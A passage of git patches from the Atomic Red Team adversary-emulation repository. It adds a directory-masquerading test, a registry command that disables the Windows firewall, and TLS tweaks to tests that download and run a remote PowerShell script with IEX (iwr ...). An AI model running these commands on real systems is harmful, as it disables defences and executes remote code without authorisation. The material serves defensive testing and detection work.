T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index d701f7c6..2c3bac55 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -365,6 +365,7 @@ defense-evasion,T1553.005,Mark-of-the-Web Bypass,2,Mount an ISO image and run ex defense-evasion,T1036.004,Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt defense-evasion,T1036.004,Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,command_prompt +defense-evasion,T1036.005,Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt defense-evasion,T1112,Modify Registry,2,Modify Registry of Local Machine - cmd,282f929a-6bc5-42b8-bd93-960c3ba35afe,command_prompt defense-evasion,T1112,Modify Registry,3,Modify registry to store logon credentials,c0413fb5-33e2-40b7-9b6f-60b29f4a7a18,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv index cd372f79..e3764d6d 100644 --- a/atomics/Indexes/Indexes-CSV/linux-index.csv +++ b/atomics/Indexes/Indexes-CSV/linux-index.csv @@ -91,6 +91,7 @@ defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modificat defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,7,chown - Change file or folder mode ownership only,967ba79d-f184-4e0e-8d09-6362b3162e99,bash defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,8,chown - Change file or folder ownership recursively,3b015515-b3d8-44e9-b8cd-6fa84faf30b2,bash defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh +defense-evasion,T1036.005,Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh defense-evasion,T1036.003,Rename System Utilities,2,Masquerading as Linux crond process.,a315bfff-7a98-403b-b442-2ea1b255e556,sh defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh diff --git a/atomics/Indexes/Indexes-CSV/macos-index.csv b/atomics/Indexes/Indexes-CSV/macos-index.csv index e9e50ace..335e60cf 100644 --- a/atomics/Indexes/Indexes-CSV/macos-index.csv +++ b/atomics/Indexes/Indexes-CSV/macos-index.csv @@ -75,6 +75,7 @@ defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modificat defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,7,chown - Change file or folder mode ownership only,967ba79d-f184-4e0e-8d09-6362b3162e99,bash defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,8,chown - Change file or folder ownership recursively,3b015515-b3d8-44e9-b8cd-6fa84faf30b2,bash defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh +defense-evasion,T1036.005,Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh defense-evasion,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh defense-evasion,T1548.001,Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 586ecb2f..2c80658d 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -636,7 +636,8 @@ - Atomic Test #2: Creating W32Time similar named service using sc [windows] - [T1036 Masquerading](../../T1036/T1036.md) - Atomic Test #1: System File Copied to Unusual Location [windows] -- T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1036.005 Match Legitimate Name or Location](../../T1036.005/T1036.005.md) + - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux] - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1112 Modify Registry](../../T1112/T1112.md) diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index 7df32bb9..bbbb7484 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md @@ -238,7 +238,8 @@ - T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1036.004 Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1036 Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1036.005 Match Legitimate Name or Location](../../T1036.005/T1036.005.md) + - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux] - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1601 Modify System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Indexes-Markdown/macos-index.md b/atomics/Indexes/Indexes-Markdown/macos-index.md index 65e062d0..9253adec 100644 --- a/atomics/Indexes/Indexes-Markdown/macos-index.md +++ b/atomics/Indexes/Indexes-Markdown/macos-index.md @@ -203,7 +203,8 @@ - Atomic Test #9: chattr - Remove immutable file attribute [macos, linux] - T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1036 Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1036.005 Match Legitimate Name or Location](../../T1036.005/T1036.005.md) + - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux] - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1027 Obfuscated Files or Information](../../T1027/T1027.md) - Atomic Test #1: Decode base64 Data into Script [macos, linux] diff --git a/atomics/Indexes/Matrices/linux-matrix.md b/atomics/Indexes/Matrices/linux-matrix.md index a6c4f9c7..e55aedd3 100644 --- a/atomics/Indexes/Matrices/linux-matrix.md +++ b/atomics/Indexes/Matrices/linux-matrix.md @@ -45,7 +45,7 @@ | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | | | | | | | | | | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | [Systemd Service](../../T1543.002/T1543.002.md) | | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | [Systemd Timers](../../T1053.006/T1053.006.md) | | Modify System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | diff --git a/atomics/Indexes/Matrices/macos-matrix.md b/atomics/Indexes/Matrices/macos-matrix.md index 9d447e38..1c1dc3c9 100644 --- a/atomics/Indexes/Matrices/macos-matrix.md +++ b/atomics/Indexes/Matrices/macos-matrix.md @@ -39,7 +39,7 @@ | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Trap](../../T1546.005/T1546.005.md) | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) | | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | | +| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | | | | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | | | | | | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md index bdd2eed9..f910d1e7 100644 --- a/atomics/Indexes/Matrices/matrix.md +++ b/atomics/Indexes/Matrices/matrix.md @@ -79,7 +79,7 @@ | | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | [Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) | | | | | | | | | | | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | | | | | [RC Scripts](../../T1037.004/T1037.004.md) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Masquerading](../../T1036/T1036.md) | | | | | | | | -| | | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | [Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | | | | | | | | | | | [Re-opened Applications](../../T1547.007/T1547.007.md) | [Shortcut Modification](../../T1547.009/T1547.009.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Startup Items](../../T1037.005/T1037.005.md) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Modify Registry](../../T1112/T1112.md) | | | | | | | | diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index fd5147ce..8af77186 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -27709,7 +27709,33 @@ defense-evasion: x_mitre_contributors: - Yossi Weizman, Azure Defender Research Team - Vishwas Manral, McAfee - atomic_tests: [] + identifier: T1036.005 + atomic_tests: + - name: Execute a process from a directory masquerading as the current parent + directory. + auto_generated_guid: 812c3ab8-94b0-4698-a9bf-9420af23ce24 + description: 'Create and execute a process from a directory masquerading as + the current parent directory (`...` instead of normal `..`) + +' + supported_platforms: + - macos + - linux + input_arguments: + test_message: + description: Test message to echo out to the screen + type: String + default: Hello from the Atomic Red Team test T1036.005#1 + executor: + name: sh + elevation_required: false + command: | + mkdir $HOME/... + cp $(which sh) $HOME/... + $HOME/.../sh -c "echo #{test_message}" + cleanup_command: | + rm -f $HOME/.../sh + rmdir $HOME/.../ T1556: technique: external_references: diff --git a/atomics/T1036.005/T1036.005.md b/atomics/T1036.005/T1036.005.md new file mode 100644 index 00000000..458839a1 --- /dev/null +++ b/atomics/T1036.005/T1036.005.md @@ -0,0 +1,47 @@ +# T1036.005 - Match Legitimate Name or Location +## [Description from ATT&CK](https://attack.mitre.org/techniques/T1036/005) +
Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous. + +Adversaries may also use the same icon of the file they are trying to mimic.
+ +## Atomic Tests + +- [Atomic Test #1 - Execute a process from a directory masquerading as the current parent directory.](#atomic-test-1---execute-a-process-from-a-directory-masquerading-as-the-current-parent-directory) + + +
+ +## Atomic Test #1 - Execute a process from a directory masquerading as the current parent directory. +Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`) + +**Supported Platforms:** macOS, Linux + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| test_message | Test message to echo out to the screen | String | Hello from the Atomic Red Team test T1036.005#1| + + +#### Attack Commands: Run with `sh`! + + +```sh +mkdir $HOME/... +cp $(which sh) $HOME/... +$HOME/.../sh -c "echo #{test_message}" +``` + +#### Cleanup Commands: +```sh +rm -f $HOME/.../sh +rmdir $HOME/.../ +``` + + + + + +
From 1531e9d3f0dc5a8e5cf5f01096c7ea8ce6737725 Mon Sep 17 00:00:00 2001 From: rctgardner <59621072+rctgardner@users.noreply.github.com> Date: Fri, 11 Jun 2021 15:26:30 -0600 Subject: [PATCH 35/84] fix t1105 indent --- atomics/T1105/T1105.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml index 9ce67778..36360c6d 100644 --- a/atomics/T1105/T1105.yaml +++ b/atomics/T1105/T1105.yaml @@ -366,12 +366,12 @@ atomic_tests: default: 1 dependencies: - - description: | - The whois and timeout commands must be present - prereq_command: | - which whois && which timeout - get_prereq_command: | - echo "Please install timeout and the whois package" + - description: | + The whois and timeout commands must be present + prereq_command: | + which whois && which timeout + get_prereq_command: | + echo "Please install timeout and the whois package" executor: name: sh From 871a3584b86c3b5cb60b2f08b949827d2c60d9b3 Mon Sep 17 00:00:00 2001 From: Jil Larner Date: Tue, 15 Jun 2021 17:44:48 +0200 Subject: [PATCH 36/84] Fixed bug in script path (#1517) The path was referring to T1595.002 instead of T1082, where the script resides. Due to the moved requested in #1320 and missed. --- atomics/T1082/T1082.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1082/T1082.yaml b/atomics/T1082/T1082.yaml index 1f5b2ab7..95e3ebc2 100644 --- a/atomics/T1082/T1082.yaml +++ b/atomics/T1082/T1082.yaml @@ -121,7 +121,7 @@ atomic_tests: vbscript: description: Path to sample script type: String - default: PathToAtomicsFolder\T1595.002\src\griffon_recon.vbs + default: PathToAtomicsFolder\T1082\src\griffon_recon.vbs executor: command: 'cscript #{vbscript}' name: powershell From 84f9f9ffdd2a132f4574d98d27f67a7fc2bc3ad2 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 15 Jun 2021 15:45:23 +0000 Subject: [PATCH 37/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 2 +- atomics/T1082/T1082.md | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 8af77186..8212b5e3 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -52704,7 +52704,7 @@ discovery: vbscript: description: Path to sample script type: String - default: PathToAtomicsFolder\T1595.002\src\griffon_recon.vbs + default: PathToAtomicsFolder\T1082\src\griffon_recon.vbs executor: command: 'cscript #{vbscript}' name: powershell diff --git a/atomics/T1082/T1082.md b/atomics/T1082/T1082.md index 9a0e9550..7c4d1d40 100644 --- a/atomics/T1082/T1082.md +++ b/atomics/T1082/T1082.md @@ -266,7 +266,7 @@ For more information see also e.g. https://malpedia.caad.fkie.fraunhofer.de/deta #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| vbscript | Path to sample script | String | PathToAtomicsFolder\T1595.002\src\griffon_recon.vbs| +| vbscript | Path to sample script | String | PathToAtomicsFolder\T1082\src\griffon_recon.vbs| #### Attack Commands: Run with `powershell`! From 7a73723a7b9b61eec382c68aa7e81cec577e162a Mon Sep 17 00:00:00 2001 From: SecurityShrimp Date: Tue, 15 Jun 2021 10:46:01 -0500 Subject: [PATCH 38/84] Update T1059.005.yaml (#1518) added lines to enable TLS v 1.2 Co-authored-by: Carrie Roberts --- atomics/T1059.005/T1059.005.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/atomics/T1059.005/T1059.005.yaml b/atomics/T1059.005/T1059.005.yaml index df243080..61f9bc20 100644 --- a/atomics/T1059.005/T1059.005.yaml +++ b/atomics/T1059.005/T1059.005.yaml @@ -54,6 +54,7 @@ atomic_tests: Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement" executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec" cleanup_command: | @@ -88,8 +89,9 @@ atomic_tests: Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059_005-macrocode.txt" -officeProduct "Word" -sub "Extract" cleanup_command: | Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin" -ErrorAction Ignore - name: powershell \ No newline at end of file + name: powershell From a78c0ae822c7bb840730abf991d3a3667aabb798 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 15 Jun 2021 15:46:52 +0000 Subject: [PATCH 39/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 4 +++- atomics/T1059.005/T1059.005.md | 2 ++ 2 files changed, 5 insertions(+), 1 deletion(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 8212b5e3..3e83219d 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -60918,6 +60918,7 @@ execution: ' executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec" cleanup_command: 'Get-WmiObject win32_process | Where-Object {$_.CommandLine @@ -60955,7 +60956,8 @@ execution: ' executor: - command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" + command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX + (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1059.005\\src\\T1059_005-macrocode.txt\" -officeProduct \"Word\" -sub \"Extract\"\n" cleanup_command: 'Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin" diff --git a/atomics/T1059.005/T1059.005.md b/atomics/T1059.005/T1059.005.md index b4f09402..42e8cd66 100644 --- a/atomics/T1059.005/T1059.005.md +++ b/atomics/T1059.005/T1059.005.md @@ -84,6 +84,7 @@ You can validate this by opening WinWord -> File -> Account -> About Word ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec" ``` @@ -137,6 +138,7 @@ memory location to a file stored in the $env:TEMP\atomic_t1059_005_test_output.b ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059_005-macrocode.txt" -officeProduct "Word" -sub "Extract" ``` From 9f397c259c8ea3f9123f23b203f2f82a2b9514ea Mon Sep 17 00:00:00 2001 From: BlueTeamOps <1480956+blueteam0ps@users.noreply.github.com> Date: Wed, 16 Jun 2021 01:49:55 +1000 Subject: [PATCH 40/84] Added Disabling Firewall via Registry (#1516) Co-authored-by: Carrie Roberts --- atomics/T1562.004/T1562.004.yaml | 13 +++++++++++++ 1 file changed, 13 insertions(+) diff --git a/atomics/T1562.004/T1562.004.yaml b/atomics/T1562.004/T1562.004.yaml index e123cf1b..24eeec66 100644 --- a/atomics/T1562.004/T1562.004.yaml +++ b/atomics/T1562.004/T1562.004.yaml @@ -36,6 +36,19 @@ atomic_tests: cleanup_command: | netsh advfirewall set currentprofile state on >nul 2>&1 name: command_prompt +- name: Disable Microsoft Defender Firewall via Registry + auto_generated_guid: afedc8c4-038c-4d82-b3e5-623a95f8a612 + description: | + Disables the Microsoft Defender Firewall for the public profile via registry + Caution if you access remotely the host where the test runs! Especially with the cleanup command which will re-enable firewall for the current profile... + supported_platforms: + - windows + executor: + command: | + reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 0 /f + cleanup_command: | + reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 1 /f + name: command_prompt - name: Allow SMB and RDP on Microsoft Defender Firewall auto_generated_guid: d9841bf8-f161-4c73-81e9-fd773a5ff8c1 description: | From 62f0f37fc663bfa36846890978c719c51a2ab07d Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Tue, 15 Jun 2021 15:50:17 +0000 Subject: [PATCH 41/84] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/used_guids.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 6b32dc04..03f6048b 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -719,3 +719,4 @@ c89becbe-1758-4e7d-a0f4-97d2188a23e3 4f08197a-2a8a-472d-9589-cd2895ef22ad d546a3d9-0be5-40c7-ad82-5a7d79e1b66b 812c3ab8-94b0-4698-a9bf-9420af23ce24 +afedc8c4-038c-4d82-b3e5-623a95f8a612 From 8a67b64944ac8c4e7d7ca01deac11c6fb5fb2727 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 15 Jun 2021 15:50:23 +0000 Subject: [PATCH 42/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 9 ++-- atomics/Indexes/Indexes-CSV/windows-index.csv | 9 ++-- atomics/Indexes/Indexes-Markdown/index.md | 9 ++-- .../Indexes/Indexes-Markdown/windows-index.md | 9 ++-- atomics/Indexes/index.yaml | 17 +++++++ atomics/T1562.004/T1562.004.md | 47 +++++++++++++++---- 6 files changed, 76 insertions(+), 24 deletions(-) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 2c3bac55..a2bca221 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -272,10 +272,11 @@ defense-evasion,T1562.002,Disable Windows Event Logging,3,Impair Windows Audit L defense-evasion,T1562.002,Disable Windows Event Logging,4,Clear Windows Audit Policy Config,913c0e4e-4b37-4b78-ad0b-90e7b25010f6,command_prompt defense-evasion,T1562.004,Disable or Modify System Firewall,1,Disable firewall,80f5e701-f7a4-4d06-b140-26c8efd1b6b4,sh defense-evasion,T1562.004,Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt -defense-evasion,T1562.004,Disable or Modify System Firewall,3,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt -defense-evasion,T1562.004,Disable or Modify System Firewall,4,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt -defense-evasion,T1562.004,Disable or Modify System Firewall,5,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell -defense-evasion,T1562.004,Disable or Modify System Firewall,6,Allow Executable Through Firewall Located in Non-Standard Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell +defense-evasion,T1562.004,Disable or Modify System Firewall,3,Disable Microsoft Defender Firewall via Registry,afedc8c4-038c-4d82-b3e5-623a95f8a612,command_prompt +defense-evasion,T1562.004,Disable or Modify System Firewall,4,Allow SMB and RDP on Microsoft Defender 